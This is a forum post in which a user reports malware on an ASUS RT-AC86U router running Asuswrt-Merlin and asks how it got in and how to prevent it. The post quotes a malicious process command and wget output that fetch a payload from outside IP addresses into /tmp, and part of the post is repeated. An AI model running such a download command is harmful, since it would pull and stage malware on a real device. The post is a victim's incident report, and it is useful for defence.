sashabe
New Around Here
I have been using an ASUSWRT-Merlin installed on RT-AC86U, 384.11-2 for a couple of years. SSH login is enabled from LAN only from a single computer (via auth key), but Web UI has been allowed for both HTTP and HTTPS. Some other customer features have been enabled (Smart Disk, Smart Access, IPSec VPN server, TimeMachine). Nothing major was installed from third party (eg Diversion, Skynet etc.) except for Transmission. Both login and password for the router are set to non default ones.
Yesterday i logged in via SSH and got a bunch of mostly failing commands that looked like this (a bigger file is attached containing a copy-paste list from Terminal):
This happens right after SSH login, so i can't enter my own commands without quickly issuing ctrl+c tens of times before the process stops throwing them replacing one with another, and i can enter my own.
I tracked the renegade process down to this command in htop: /bin/sh -c wget --timeout=10 --tries=3 http://103.29.215.199:8078/H9PIVokOxv4nQdme/dlr -O /tmp/x. The "x" file is empty. But most of the these connections are failing anyway.
Tried to grep the router for some source file that starts the commands, but to no avail. Also it seems as if the malware should have put something into an sh profile file that runs on SSH login, but eg /etc/profile seems clean.
Have you ever encountered this type of malware? How could I have prevented it as a lesson learnt? I guess I'd need to update the firmware anyway, but wasn't SSH login secure in this case?
Yesterday i logged in via SSH and got a bunch of mostly failing commands that looked like this (a bigger file is attached containing a copy-paste list from Terminal):
Code:
--2022-07-16 13:33:03-- http://184.70.140.86:8078/H9PIVokOxv4nQdme/dlr
Connecting to 184.70.140.86:8078... connected.
HTTP request sent, awaiting response...
This happens right after SSH login, so i can't enter my own commands without quickly issuing ctrl+c tens of times before the process stops throwing them replacing one with another, and i can enter my own.
I tracked the renegade process down to this command in htop: /bin/sh -c wget --timeout=10 --tries=3 http://103.29.215.199:8078/H9PIVokOxv4nQdme/dlr -O /tmp/x. The "x" file is empty. But most of the these connections are failing anyway.
Tried to grep the router for some source file that starts the commands, but to no avail. Also it seems as if the malware should have put something into an sh profile file that runs on SSH login, but eg /etc/profile seems clean.
Have you ever encountered this type of malware? How could I have prevented it as a lesson learnt? I guess I'd need to update the firmware anyway, but wasn't SSH login secure in this case?